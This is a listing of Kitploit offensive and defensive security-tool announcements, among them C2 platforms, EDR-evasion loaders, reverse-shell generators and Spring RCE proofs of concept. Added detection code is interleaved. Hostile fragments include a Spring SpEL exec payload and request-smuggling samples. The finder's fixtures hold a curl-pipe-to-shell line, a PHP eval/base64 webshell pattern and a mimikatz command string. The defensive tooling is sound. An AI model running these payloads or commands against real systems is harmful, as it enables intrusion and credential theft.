Lucene search: Kitploit (6011 matches found)

Kitploit | added 2022/04/09 12:30 p.m. | 30 views

Uncover - Quickly Discover Exposed Hosts On The Internet Using Multiple Search Engine

uncover is a Go wrapper around the APIs of well-known search engines to quickly discover exposed hosts on the internet. It is built with automation in mind, so you can query it and use the results with your current pipeline tools. Currently, it supports the shodan, censys, and fofa search engine...

AI score: 7.5 | Exploits: 0 | References: 5

Kitploit | added 2022/04/08 9:30 p.m. | 83 views

Cloak - A Censorship Circumvention Tool To Evade Detection By Authoritarian State Adversaries

Cloak is a pluggable transport that enhances traditional proxy tools like OpenVPN to evade sophisticated censorship and data discrimination. Cloak is not a standalone proxy program. Rather, it works by masquerading proxied traffic as normal web browsing activities. In contrast to traditional tool...

AI score: 6.9 | Exploits: 0 | References: 22

Kitploit | added 2022/04/08 12:30 p.m. | 25 views

OffensiveNotion - Notion As A Platform For Offensive Operations

Notion (yes, the notetaking app) as a C2. Wait, what? Yes. But why? What started as a meme grew into a full project. Just roll with it. Read more! Here's our blog post about it: We Put A C2 In Your Notetaking App: OffensiveNotion. Features: A full-featured C2 platform built on the Notion notetaking...

AI score: 7.8 | Exploits: 0 | References: 3

Kitploit | added 2022/04/07 9:30 p.m. | 38 views

Octosuite - Advanced Github OSINT Framework

Simply gather OSINT on GitHub users and organizations like a god. Features: fetches organization info; fetches user info; fetches repository info; returns the contents of a path from a repository; returns a list of repos owned by an organization; returns a list of repos owned by a user; returns a list of...

AI score: 7.2 | Exploits: 0 | References: 1

Kitploit | added 2022/04/07 12:30 p.m. | 19 views

Gitbleed_Tools - For Extracting Data From Mirrorred Git Repositories

This repo contains shell scripts that can be used to download and analyze differences between cloned and mirrored Git repositories. For more information about the underlying quirk in Git behavior, please read our blog post. What do these scripts do? These scripts will clone a copy of the give...

AI score: 6.9 | Exploits: 0 | References: 5

Kitploit | added 2022/04/06 9:30 p.m. | 28 views

Hcltm - Documenting Your Threat Models With HCL

Threat Modeling with HCL. Overview: there are many different ways in which a threat model can be documented, from a simple text file, to more in-depth Word documents, to fully instrumented threat models in a centralised solution. Two of the most valuable attributes of a threat model are being able ...

AI score: 7.2 | Exploits: 0 | References: 16

Kitploit | added 2022/04/06 12:30 p.m. | 55 views

KNX-Bus-Dump - A Tool To Listen On A KNX Bus Via TPUART And The Calimero Project Suite And To Dump The Data From The Packets Into A Wireshark-Compatible File Hex Dump

KNX is a popular building automation protocol and is used to interconnect sensors, actuators and other components of a smart building together. Our KNX Bus Dump tool uses the Calimero java library, which we contributed to for the sake of this tool, to record the telegrams sent over a KNX bus...

AI score: 7.6 | Exploits: 0 | References: 3

Kitploit | added 2022/04/05 9:30 p.m. | 29 views

ScheduleRunner - A C# Tool With More Flexibility To Customize Scheduled Task For Both Persistence And Lateral Movement In Red Team Operation

Scheduled tasks are one of the most popular attack techniques of the past decade and are still commonly used by attackers and red teamers for persistence and lateral movement. A number of C# tools have already been developed to simulate attacks using scheduled tasks. I have been playing around with some...

AI score: 7.8 | Exploits: 0 | References: 4

Kitploit | added 2022/04/05 12:30 p.m. | 22 views

DarthSidious - Building An Active Directory Domain And Hacking It

The goal is simple: to share my modest knowledge about hacking Windows systems. This is commonly referred to as red team exercises. This book, however, is also very concerned with the blue team, the defenders. That is, helping those who are working as defenders, analysts and security experts to buil...

AI score: 7.3 | Exploits: 0 | References: 6

Kitploit | added 2022/04/04 9:30 p.m. | 35 views

ICMP-TransferTools - Transfer Files To And From A Windows Host Via ICMP In Restricted Network Environments

ICMP-TransferTools is a set of scripts designed to move files to and from Windows hosts in restricted network environments. This is accomplished using a total of 4 different files, consisting of a Python server and a PowerShell client for each transfer direction (download and upload). The only dependen...

AI score: 7.3 | Exploits: 0 | References: 3

Kitploit | added 2022/04/04 12:30 p.m. | 62 views

Live-Forensicator - PowerShell Script To Aid Incident Response And Live Forensics

Live Forensicator is part of the Black Widow Toolbox; its aim is to assist forensic investigators and incident responders in carrying out a quick live forensic investigation. It achieves this by gathering different system information for further review for anomalous behaviour or unexpected data...

AI score: 6.9 | Exploits: 0 | References: 2

Kitploit | added 2022/04/03 9:30 p.m. | 28 views

Phantun - Transforms UDP Stream Into (Fake) TCP Streams That Can Go Through Layer 3 & Layer 4 (NAPT) firewalls/NATs

Phantun is a project that obfuscates UDP packets into TCP connections. It aims to achieve maximum performance with minimum processing and encapsulation overhead. It is commonly used in environments where UDP is blocked or throttled but TCP is allowed through. Phantun simply converts a stream of UDP...

AI score: 6.9 | Exploits: 0 | References: 4

Kitploit | added 2022/04/03 12:30 p.m. | 23 views

CobaltBus - Cobalt Strike External C2 Integration With Azure Servicebus, C2 Traffic Via Azure Servicebus

Cobalt Strike External C2 integration with Azure Service Bus; C2 traffic via Azure Service Bus. Setup: 1. Create an Azure Service Bus. 2. Create a Shared access policy connection string that can only Send and Listen. 3. Edit the static connectionString variable in the Beacon C# projects to match the "Primar...

AI score: 7.2 | Exploits: 0 | References: 2

Kitploit | added 2022/04/02 8:30 p.m. | 113 views

Odin - Central IoC Scanner Based On Loki

Odin is a central IoC scanner based on Loki. General info: this application takes the latest Loki version, downloads it to all machines using a PowerShell script and runs it; it then receives the response from all machines and parses the feed in CSV form. Requirements: 1. Python 3.5+ 2. PyQt5 3. psutil 4...

AI score: 7.2 | Exploits: 0 | References: 6

Kitploit | added 2022/04/02 11:30 a.m. | 17 views

Subdomains.Sh - A Wrapper Around Tools I Use For Subdomain Enumeration On A Given Domain. This Script Is Written With The Aim To Automate The Workflow

subdomains.sh is a wrapper around tools I use for subdomain enumeration, to automate the workflow, on a given domain. Usage: to display this script's help message, use the -h flag: subdomains.sh -h. Options: --use-passive-source: comma-separated tools to use; --exclude-passive-source: comma-separat...

AI score: 7.2 | Exploits: 0 | References: 17

Kitploit | added 2022/04/01 8:30 p.m. | 114 views

Auto-Elevate - Escalate From A Low-Integrity Administrator Account To NT AUTHORITY\SYSTEM Without An LPE Exploit By Combining A COM UAC Bypass And Token Impersonation

This tool demonstrates the power of UAC bypasses and built-in features of Windows. This utility auto-locates winlogon.exe, steals and impersonates its process token, and spawns a new SYSTEM-level process with the stolen token. Combined with UAC bypass method 41 (the ICMLuaUtil UAC bypass) from...

AI score: 7.5 | Exploits: 0 | References: 4

Kitploit | added 2022/04/01 11:30 a.m. | 12 views

Slyther - AWS Security Tool

Slyther is an AWS security tool to check read/write/delete access for S3 buckets. Requirements: aws-cli. Installation: pip3 install -r requirements.txt. Usage example: python3 slyther.py -b flaws.cloud. Release history: 0.0.3 added an option to check whether aws-cli is installed or not; 0.0.2 added an option to check...

AI score: 7.3 | Exploits: 0 | References: 1

Kitploit | added 2022/03/31 8:30 p.m. | 19 views

Spring-Spel-0Day-Poc - Spring-Cloud / spring-cloud-function, spring.cloud.function.routing-expression, RCE, 0day, 0-day, POC, EXP

spring-cloud/spring-cloud-function RCE EXP/POC. https://github.com/spring-cloud/spring-cloud-function. Header: spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("open -a calculator.app"). Build: wget...

AI score: 7.4 | Exploits: 0 | References: 5

Kitploit | added 2022/03/31 11:30 a.m. | 1273 views

CVE-2022-22963 - PoC Spring Java Framework 0-day Remote Code Execution Vulnerability

To run the vulnerable Spring Boot application, run this Docker container exposing it on port 8080. Example: docker run -it -d -p 8080:8080 bobcheat/springboot-public. Exploit curl command: curl -i -s -k -X $'POST' -H $'Host: 192.168.1.2:8080' -H...

CVSS: 9.8 | AI score: 9.9 | EPSS: 0.99939 | Exploits: 36 | References: 3
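Both the Spring-Spel-0Day-Poc entry above and this CVE-2022-22963 PoC inject a SpEL expression through the spring.cloud.function.routing-expression header, but neither ships the matching detection. The following is an added example, not code from either repository: it scans constructed proxy log lines for that header and flags values that contain a SpEL type reference or constructor call instead of a plain function name. The JSON-lines log format and its field names are assumptions; adapt the record parsing to your own proxy's output.

```python
import json
import re

# Header that vulnerable spring-cloud-function versions evaluate as SpEL
# (CVE-2022-22963); the name is taken from the PoCs above.
ROUTING_HEADER = "spring.cloud.function.routing-expression"

# SpEL constructs that never belong in a routing key: type references such as
# T(java.lang.Runtime), constructor calls, bean references and template markers.
DANGEROUS_SPEL = re.compile(r"\bT\s*\(|\bnew\s+[\w.]+\s*\(|@\w+|#\{")

# A legitimate routing value names a function, optionally a composition:
# "uppercase" or "uppercase|reverse".
ROUTING_KEY = re.compile(r"^[\w.-]+(\|[\w.-]+)*$")

# Constructed sample log (JSON lines, one request per line, headers recorded).
# The format is an assumption, not any real server's output.
SAMPLE_LOG = r'''
{"ts": "2022-03-31T11:30:00Z", "src": "203.0.113.7", "method": "POST", "path": "/functionRouter", "headers": {"Host": "192.168.1.2:8080", "spring.cloud.function.routing-expression": "T(java.lang.Runtime).getRuntime().exec(\"touch /tmp/pwned\")"}}
{"ts": "2022-03-31T11:30:01Z", "src": "198.51.100.4", "method": "POST", "path": "/functionRouter", "headers": {"Host": "192.168.1.2:8080", "Spring.Cloud.Function.Routing-Expression": "uppercase|reverse"}}
{"ts": "2022-03-31T11:30:02Z", "src": "198.51.100.9", "method": "GET", "path": "/actuator/health", "headers": {"Host": "192.168.1.2:8080"}}
'''


def classify(expression):
    """Label one routing-expression header value."""
    if DANGEROUS_SPEL.search(expression):
        return "exploit-attempt"
    if ROUTING_KEY.match(expression):
        return "routing-key"
    return "review"  # some other SpEL; not a plain function name, not a known-bad shape


def scan(log_text):
    """One finding per request that carried the routing header, in log order."""
    findings = []
    for line in log_text.strip().splitlines():
        record = json.loads(line)
        # Header names are case-insensitive; normalise before the lookup.
        headers = {k.lower(): v for k, v in record.get("headers", {}).items()}
        expression = headers.get(ROUTING_HEADER)
        if expression is None:
            continue
        findings.append({
            "ts": record["ts"], "src": record["src"], "path": record["path"],
            "verdict": classify(expression), "expression": expression,
        })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ts']} {f['src']:>15} {f['verdict']:<16} {f['expression']}")
```

Any request carrying this header at all is worth a look on an application that does not use function routing; the "review" verdict exists so that unusual but non-obvious expressions are not silently accepted.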
Kitploit | added 2022/03/30 8:30 p.m. | 148 views

CVE-2022-27254 - PoC For Vulnerability In Honda's Remote Keyless System

PoC for vulnerability in Honda's Remote Keyless System (CVE-2022-27254). Disclaimer: for educational purposes only. Kindly note that the discoverers of this vulnerability are Ayyappan Rajesh, a student at UMass Dartmouth, and HackingIntoYourHeart. Others mentioned in this repository are credited for...

CVSS: 5.3 | AI score: 6.2 | EPSS: 0.01083 | Exploits: 2 | References: 3

Kitploit | added 2022/03/30 12:30 p.m. | 24 views

Casper-Fs - A Custom Hidden Linux Kernel Module Generator. Each Module Works In The File System To Protect And Hide Secret Files

Casper-fs is a custom Linux kernel module generator that works with resources to protect or hide a custom list of files. Each LKM has resources to protect or hide files following a custom list in the YAML rule file. Yes, not even root has permission to see the files or perform actions like edit and...

AI score: 7.2 | Exploits: 0 | References: 2

Kitploit | added 2022/03/29 8:30 p.m. | 31 views

LAZYPARIAH - A Tool For Generating Reverse Shell Payloads On The Fly

A low-dependency command-line tool for generating reverse shell payloads on the fly. Description: LAZYPARIAH is a simple and easily installable command-line tool written in pure Ruby that can be used during penetration tests and capture-the-flag (CTF) competitions to generate a range of reverse shel...

AI score: 7.7 | Exploits: 0 | References: 1

Kitploit | added 2022/03/29 11:30 a.m. | 43 views

Socid-Extractor - Extract Accounts Info From Personal Pages On Various Sites For OSINT Purpose

Extract information about a user from profile webpages / API responses and save it in a machine-readable format. Usage as a command-line tool: $ socid_extractor --url https://www.deviantart.com/muse1908 prints country: France; created_at: 2005-06-16 18:17:41; gender: female; username: Muse1908; website:...

AI score: 7.5 | Exploits: 0 | References: 9

Kitploit | added 2022/03/28 8:30 p.m. | 34 views

Fennec - Artifact Collection Tool For *Nix Systems

fennec is an artifact collection tool written in Rust to be used during incident response on *nix-based systems. fennec allows you to write a configuration file that describes how to collect artifacts. Features: a single statically compiled binary; execute any osquery SQL query; execute system command...

AI score: 7.7 | Exploits: 0 | References: 2

Kitploit | added 2022/03/28 11:30 a.m. | 27 views

Gitcolombo - Extract And Analyze Contributors Info From Git Repos

OSINT tool to extract info about persons from git repositories: common names, emails, and matches between accounts that may seem unrelated. Usage: 1. Install git. 2. Run: repos by nickname: ./gitcolombo.py --nickname LubyRuffy; from any git URL: ./gitcolombo.py -u...

AI score: 7.3 | Exploits: 0 | References: 2

Kitploit | added 2022/03/27 8:30 p.m. | 71 views

Ostorlab - A Security Scanning Platform That Enables Running Complex Security Scanning Tasks Involving Multiple Tools In An Easy, Scalable And Distributed Way

The sales pitch: if this is the first time you are visiting the Ostorlab GitHub page, here is the sales pitch. Security testing often requires chaining tools together, taking the output from one, mangling it, filtering it and then pushing it to another tool. Several tools have tried to make the...

AI score: 7.2 | Exploits: 0 | References: 1

Kitploit | added 2022/03/27 11:30 a.m. | 260 views

Nimcrypt2 - .NET, PE, And Raw Shellcode Packer/Loader Written In Nim

Nimcrypt2 is yet another PE packer/loader designed to bypass AV/EDR. It is an improvement on my original Nimcrypt project, with the main improvements being the use of direct syscalls and the ability to load regular PE files as well as raw shellcode. Before going any further, I must acknowledge...

AI score: 7.9 | Exploits: 0 | References: 8

Kitploit | added 2022/03/26 8:30 p.m. | 26 views

Request_Smuggler - Http Request Smuggling Vulnerability Scanner

Based on the amazing research by James Kettle. The tool can help to find servers that may be vulnerable to request smuggling. Usage: request_smuggler [OPTIONS] --url ... Flags: -h, --help prints help information; -V, --version prints version information. Options: --amount-of-payloads...

AI score: 7.2 | Exploits: 0 | References: 1
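The scanner above probes servers from the outside; the complementary check on the defensive side is to refuse the ambiguous requests that make the desync possible in the first place. The following is an added example, not code from request_smuggler or from Kettle's research: it parses a raw HTTP/1.1 request head and reports the primitives that research relies on (Content-Length together with Transfer-Encoding, conflicting Content-Length values, non-canonical Transfer-Encoding values such as xchunked, and header names padded with whitespace). The sample requests are constructed, not captured traffic.

```python
import re

# RFC 7230 "token" characters allowed in a header field name. Anything else
# (a space before the colon, a tab, a stray byte) is a sign that a front-end
# and a back-end may attribute the header differently.
TOKEN = re.compile(r"^[!#$%&'*+.^_`|~0-9A-Za-z-]+$")


def parse_head(raw):
    """Split a raw HTTP/1.1 request into (request_line, [(raw_name, raw_value), ...])."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        if not line:
            continue
        name, _, value = line.partition(":")
        headers.append((name, value))          # kept raw on purpose; see audit()
    return lines[0], headers


def audit(raw):
    """Return (code, detail) findings for request-smuggling primitives."""
    _, headers = parse_head(raw)
    findings = []
    content_lengths, transfer_encodings = [], []
    for name, value in headers:
        if not TOKEN.match(name):
            findings.append(("MALFORMED_HEADER_NAME", repr(name)))
        canonical = name.strip().lower()
        if canonical == "content-length":
            content_lengths.append(value.strip(" \t"))
        elif canonical == "transfer-encoding":
            transfer_encodings.append(value)   # raw: whitespace tricks must stay visible
    if content_lengths and transfer_encodings:
        # CL.TE / TE.CL: one hop honours Content-Length, the next honours chunked.
        findings.append(("CL_TE_BOTH", "Content-Length and Transfer-Encoding on one request"))
    if len(set(content_lengths)) > 1:
        findings.append(("CL_CONFLICT", ", ".join(content_lengths)))
    for value in content_lengths:
        if not value.isdigit():
            findings.append(("CL_NOT_NUMERIC", repr(value)))
    for value in transfer_encodings:
        # "xchunked", "chunked\t", "Chunked", "cow, chunked": each is treated as chunked
        # by some servers and ignored by others. Only the exact form is accepted here.
        if value not in (" chunked", "chunked"):
            findings.append(("TE_NONCANONICAL", repr(value)))
    return findings


def safe_to_forward(raw):
    """Strict front-end policy: reject any request with a finding rather than normalise it."""
    return not audit(raw)


# Constructed requests (not captured traffic).
CLEAN = b"POST / HTTP/1.1\r\nHost: example\r\nContent-Length: 5\r\n\r\nhello"
CL_TE = (b"POST / HTTP/1.1\r\nHost: example\r\nContent-Length: 13\r\n"
         b"Transfer-Encoding: chunked\r\n\r\n0\r\n\r\nSMUGGLED")
OBFUSCATED_TE = (b"POST / HTTP/1.1\r\nHost: example\r\nContent-Length: 4\r\n"
                 b"Transfer-Encoding: xchunked\r\n\r\n5c\r\nGPOST / HTTP/1.1\r\n\r\n")
SPACED_NAME = (b"POST / HTTP/1.1\r\nHost: example\r\nContent-Length: 4\r\n"
               b"Transfer-Encoding : chunked\r\n\r\n0\r\n\r\n")

if __name__ == "__main__":
    for label, req in [("clean", CLEAN), ("cl.te", CL_TE),
                       ("xchunked", OBFUSCATED_TE), ("spaced-name", SPACED_NAME)]:
        print(label, audit(req))
```

Rejecting with a 400 is the safe choice: RFC 7230 lets a server drop Content-Length when Transfer-Encoding is present, but a front-end that silently normalises has to be certain every back-end behind it does the same, which is exactly the assumption smuggling breaks.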
Kitploit | added 2022/03/26 11:30 a.m. | 27 views

Zkar - A Java Serialization Protocol Analysis Tool Implement In Go

ZKar is a Java serialization protocol analysis tool implemented in Go. This tool is still a work in progress, so there is no complete API document or contribution guide yet. ZKar provides: a Java serialization payload parser and viewer in pure Go (no CGO or JDK is required); from the Java serialization protocol ...

AI score: 7.5 | Exploits: 0 | References: 6
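To show what a parser of this protocol has to do before it can say anything about a payload, here is an added example (not ZKar's code, and in Python rather than Go): it validates the stream header and walks the first object's class descriptor, which is enough to name the outermost class and its superclass chain, the first thing an analyst wants from an unknown blob. The sample stream is constructed by hand from the protocol constants and stops after the class descriptor; it is not a real capture, and class annotations and nested object graphs are out of scope.

```python
import struct

# Constants from the Java Object Serialization Stream Protocol (ObjectStreamConstants).
STREAM_MAGIC, STREAM_VERSION = 0xACED, 5
TC_NULL, TC_REFERENCE, TC_CLASSDESC, TC_OBJECT, TC_STRING = 0x70, 0x71, 0x72, 0x73, 0x74
TC_ENDBLOCKDATA = 0x78
SC_WRITE_METHOD, SC_SERIALIZABLE = 0x01, 0x02


class Reader:
    """Big-endian cursor over the stream bytes."""
    def __init__(self, data):
        self.data, self.pos = data, 0

    def take(self, fmt):
        value, = struct.unpack_from(">" + fmt, self.data, self.pos)
        self.pos += struct.calcsize(fmt)
        return value

    def utf(self):
        # Modified UTF-8 string: 2-byte length prefix, then the bytes.
        length = self.take("H")
        raw = self.data[self.pos:self.pos + length]
        self.pos += length
        return raw.decode("utf-8")


def read_class_desc(r):
    """Parse a classDesc whose TC_CLASSDESC tag has already been consumed."""
    name = r.utf()
    suid = r.take("Q")
    flags = r.take("B")
    fields = []
    for _ in range(r.take("H")):
        typecode = chr(r.take("B"))          # one of B C D F I J S Z L [
        field_name = r.utf()
        class_name = None
        if typecode in "L[":                # object/array fields carry their type as a string
            tag = r.take("B")
            if tag == TC_STRING:
                class_name = r.utf()
            elif tag == TC_REFERENCE:
                r.take("I")                 # back-reference handle; not resolved here
                class_name = "<ref>"
            else:
                raise ValueError("unexpected tag 0x%02x in field type" % tag)
        fields.append((typecode, field_name, class_name))
    if r.take("B") != TC_ENDBLOCKDATA:      # class annotations are not supported
        raise ValueError("class annotation data not supported")
    tag = r.take("B")
    if tag == TC_CLASSDESC:
        superclass = read_class_desc(r)
    elif tag == TC_NULL:
        superclass = None
    else:
        raise ValueError("unexpected superclass tag 0x%02x" % tag)
    return {"name": name, "suid": suid, "flags": flags, "fields": fields, "super": superclass}


def inspect(data):
    """Validate the stream header and return the first object's class descriptor."""
    r = Reader(data)
    if r.take("H") != STREAM_MAGIC or r.take("H") != STREAM_VERSION:
        raise ValueError("not a Java serialization stream")
    if r.take("B") != TC_OBJECT or r.take("B") != TC_CLASSDESC:
        raise ValueError("stream does not start with a plain TC_OBJECT/TC_CLASSDESC")
    return read_class_desc(r)


def class_chain(desc):
    """Class names from the outermost class up its superclass chain."""
    names = []
    while desc:
        names.append(desc["name"])
        desc = desc["super"]
    return names


def build_sample():
    """Constructed stream: the descriptor of a java.util.HashMap (fields loadFactor,
    threshold), with no class data behind it. Not a real capture."""
    def utf(s):
        b = s.encode()
        return struct.pack(">H", len(b)) + b
    return (struct.pack(">HH", STREAM_MAGIC, STREAM_VERSION)
            + bytes([TC_OBJECT, TC_CLASSDESC]) + utf("java.util.HashMap")
            + struct.pack(">Q", 0x0507DAC1C31660D1) + bytes([SC_SERIALIZABLE | SC_WRITE_METHOD])
            + struct.pack(">H", 2) + b"F" + utf("loadFactor") + b"I" + utf("threshold")
            + bytes([TC_ENDBLOCKDATA, TC_NULL]))
```

The magic bytes AC ED 00 05 are what most network and WAF signatures key on; everything after them is where a tool like ZKar earns its keep, because the class name and field list tell you which gadget chain, if any, you are looking at.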
Kitploit | added 2022/03/25 8:30 p.m. | 34 views

SysWhispers3 - AV/EDR Evasion Via Direct System Calls

SysWhispers helps with evasion by generating header/ASM files that implants can use to make direct system calls. Why on earth didn't I create a PR to SysWhispers2? The reasons for SysWhispers3 being a standalone version are many, but the most important are: SysWhispers3 is the de-facto "fork" used by...

AI score: 7.6 | Exploits: 0 | References: 7

Kitploit | added 2022/03/25 11:30 a.m. | 19 views

Factual-Rules-Generator - An Open Source Project Which Aims To Generate YARA Rules About Installed Software From A Machine

Factual-rules-generator is an open source project which aims to generate YARA rules about installed software from a running operating system. The goal of the software is to be able to use a set of rules against collected or acquired digital forensic evidence and find installed software in a time...

AI score: 7 | Exploits: 0 | References: 6

Kitploit | added 2022/03/24 10:4 p.m. | 33 views

Tiktok-Scraper - TikTok Scraper. Download Video Posts, Collect User/Trend/Hashtag/Music Feed Metadata, Sign URL And Etc

Scrape and download useful information from TikTok. No login or password is required. This is not an official API; it is just a scraper that uses the TikTok Web API to scrape media and related meta information. Important notes: as of right now it is NOT possible to download video...

AI score: 7.2 | Exploits: 0 | References: 5

Kitploit | added 2022/03/24 11:30 a.m. | 28 views

ADExplorerSnapshot.py - An AD Explorer Snapshot Parser. It Is Made As An Ingestor For BloodHound, And Also Supports Full-Object Dumping To NDJSON

ADExplorerSnapshot.py is an AD Explorer snapshot parser. It is made as an ingestor for BloodHound, and also supports full-object dumping to NDJSON. AD Explorer allows you to connect to a DC and browse LDAP data. It can also create snapshots of the server you are currently attached to. This tool...

AI score: 6.8 | Exploits: 0 | References: 5

Kitploit | added 2022/03/23 11:30 a.m. | 24 views

ShellcodeTemplate - An Easily Modifiable Shellcode Template For Windows X64/X86

An easily modifiable shellcode template for Windows x64/x86. How does it work? This template is heavily based on Austin Hudson's (aka SecIdiot) TitanLdr. It compiles the project into a PE executable and extracts the .text section. Example: the entrypoint of the shellcode looks like this. Of course, thi...

AI score: 7.4 | Exploits: 0 | References: 3

Kitploit | added 2022/03/22 11:32 p.m. | 37 views

FastFinder - Incident Response - Fast Suspicious File Finder

FastFinder is a lightweight tool made for threat hunting, live forensics and triage on both Windows and Linux platforms. It is focused on endpoint enumeration and suspicious file finding based on various criteria: file path / name; md5 / sha1 / sha256 checksum; simple string content match; complex...

AI score: 6.9 | Exploits: 0 | References: 4
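The criteria listed above (path or name, checksum, string match, regex) are the core of any triage finder, so here is an added example of that matching loop, written for this page and not taken from FastFinder: rules are plain dicts whose criteria are ANDed, hashing and content reads happen lazily and only once per file, content reads are capped, and unreadable files are skipped instead of aborting the sweep. The rule names, the sample directory tree and the "known bad" hash are all constructed for the demonstration.

```python
import fnmatch
import hashlib
import os
import re
import tempfile

# Constructed "known bad" digest so the sample below is self-contained.
KNOWN_BAD_SHA256 = hashlib.sha256(b"constructed malicious sample\n").hexdigest()

# Each rule's criteria are ANDed; a file matches when every criterion holds.
# Path globs are matched against the full path, so "*/tmp/*.sh" works anywhere.
RULES = [
    {"name": "known-bad-hash", "sha256": {KNOWN_BAD_SHA256}},
    {"name": "php-eval-webshell", "path": ["*.php"], "regex": rb"eval\s*\(\s*base64_decode\s*\("},
    {"name": "script-in-tmp", "path": ["*/tmp/*.sh", "*/Temp/*.exe"]},
    {"name": "credential-dumper-string", "strings": [b"mimikatz"]},
]


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def match_file(path, rules, max_content=8 << 20):
    """Names of the rules that the file at `path` satisfies."""
    hits, digest, content = [], None, None
    for rule in rules:
        if "path" in rule and not any(fnmatch.fnmatch(path, p) for p in rule["path"]):
            continue
        if "sha256" in rule:
            digest = digest or sha256_of(path)        # hash once, reuse for later rules
            if digest not in rule["sha256"]:
                continue
        if "strings" in rule or "regex" in rule:
            if content is None:
                with open(path, "rb") as f:
                    content = f.read(max_content)     # capped: this is triage, not full parsing
            if "strings" in rule and not all(s in content for s in rule["strings"]):
                continue
            if "regex" in rule and not re.search(rule["regex"], content):
                continue
        hits.append(rule["name"])
    return hits


def scan(root, rules=RULES):
    """Walk `root`; return {relative path: [rule names]} for files with at least one hit."""
    findings = {}
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            full = os.path.join(dirpath, fn)
            try:
                hits = match_file(full, rules)
            except OSError:            # unreadable or vanished file: skip, keep sweeping
                continue
            if hits:
                findings[os.path.relpath(full, root).replace(os.sep, "/")] = hits
    return findings


def build_sample_tree():
    """Constructed directory tree that exercises each rule once."""
    root = tempfile.mkdtemp(prefix="finder-demo-")
    files = {
        "tmp/dropper.sh": b"#!/bin/sh\ncurl http://203.0.113.1/x | sh\n",
        "var/www/html/index.php": b"<?php eval(base64_decode('aGk=')); ?>",
        "home/u/cache.bin": b"constructed malicious sample\n",
        "home/u/tools/dump.txt": b"run mimikatz sekurlsa::logonpasswords",
        "home/u/notes.txt": b"nothing to see here\n",
    }
    for rel, data in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as f:
            f.write(data)
    return root


if __name__ == "__main__":
    for path, hits in scan(build_sample_tree()).items():
        print(f"{path}: {', '.join(hits)}")
```

Ordering the cheap criteria (path) before the expensive ones (hash, content) is what keeps a sweep of a whole disk practical; it is also why a rule that only carries a hash set makes every file get hashed.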
Kitploit | added 2022/03/21 8:30 p.m. | 37 views

Vortex - VPN Overall Reconnaissance, Testing, Enumeration And eXploitation Toolkit

VPN Overall Reconnaissance, Testing, Enumeration and Exploitation Toolkit Overview A very simple Python framework, inspired by SprayingToolkit, that tries to automate most of the process required to detect, enumerate and attack common O365 and VPN endpoints like Cisco, Citrix, Fortinet, Pulse,...

AI score: 8 | Exploits: 0 | References: 12

Kitploit | added 2022/03/21 11:30 a.m. | 16 views

Oh365UserFinder - Python3 O365 User Enumeration Tool

Oh365UserFinder is used for identifying valid O365 accounts and domains without the risk of account lockouts. The tool parses responses to identify whether the "IfExistsResult" flag is null or not, and responds appropriately if the user is valid. The tool will attempt to identify false positives based on...

AI score: 7.3 | Exploits: 0 | References: 2

Kitploit | added 2022/03/20 8:30 p.m. | 50 views

PSRansom - PowerShell Ransomware Simulator With C2 Server

PSRansom is a PowerShell ransomware simulator with C2 server capabilities. This tool helps you simulate the encryption process of a generic ransomware on any system with PowerShell installed. Thanks to the integrated C2 server, you can exfiltrate files and receive client informati...

AI score: 7 | Exploits: 0 | References: 1

Kitploit | added 2022/03/20 11:30 a.m. | 24 views

S3Sec - Check AWS S3 Instances For Read/Write/Delete Access

Test AWS S3 buckets for read/write/delete access This tool was developed to quickly test a list of s3 buckets for public read, write and delete access for the purposes of penetration testing on bug bounty programs. Found a bug bounty using this tool? Feel free to add me as a collaborator: @0xmoot...

AI score: 7.5 | Exploits: 0 | References: 1
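S3Sec and Slyther (above) both establish read/write/delete exposure empirically, by attempting the operations against the bucket. The offline counterpart, useful when you already hold a bucket's ACL from an inventory export, is to read the public grants off the ACL itself. The following is an added example for this page, not code from either tool: it takes a GetBucketAcl-shaped dict and reports which public grantee can list, write, delete or change the ACL. The sample ACLs are constructed; the grantee group URIs and permission names are the ones S3 itself uses.

```python
from collections import defaultdict

# Group grantees that make a grant public. AuthenticatedUsers means any AWS
# account in the world, not just yours, so it counts as public here.
PUBLIC_GRANTEES = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "anyone",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "any-aws-account",
}

# Bucket ACL permissions and the operations they allow. READ on a bucket lists
# its keys; WRITE permits creating, overwriting and deleting objects.
OPERATIONS = {
    "READ": {"list"},
    "WRITE": {"write", "delete"},
    "READ_ACP": {"read-acl"},
    "WRITE_ACP": {"write-acl"},
    "FULL_CONTROL": {"list", "write", "delete", "read-acl", "write-acl"},
}


def public_access(acl):
    """Map public grantee -> set of operations, from a GetBucketAcl-shaped dict."""
    result = defaultdict(set)
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") != "Group":
            continue                       # canonical users and e-mail grantees are not public
        who = PUBLIC_GRANTEES.get(grantee.get("URI"))
        if who is None:
            continue                       # e.g. the LogDelivery group
        result[who] |= OPERATIONS.get(grant.get("Permission"), set())
    return dict(result)


def worst_public_operation(acl):
    """Most damaging public capability, or None when nothing is public."""
    ops = set().union(*public_access(acl).values())
    for level in ("write-acl", "delete", "write", "list", "read-acl"):
        if level in ops:
            return level
    return None


# Constructed ACLs (not real buckets).
OWNER = {"Type": "CanonicalUser", "ID": "owner-canonical-id"}
PRIVATE = {"Owner": {"ID": "owner-canonical-id"},
           "Grants": [{"Grantee": OWNER, "Permission": "FULL_CONTROL"}]}
WORLD_LIST = {"Owner": {"ID": "owner-canonical-id"},
              "Grants": [{"Grantee": OWNER, "Permission": "FULL_CONTROL"},
                         {"Grantee": {"Type": "Group",
                                      "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
                          "Permission": "READ"}]}
WORLD_WRITE = {"Owner": {"ID": "owner-canonical-id"},
               "Grants": [{"Grantee": OWNER, "Permission": "FULL_CONTROL"},
                          {"Grantee": {"Type": "Group",
                                       "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"},
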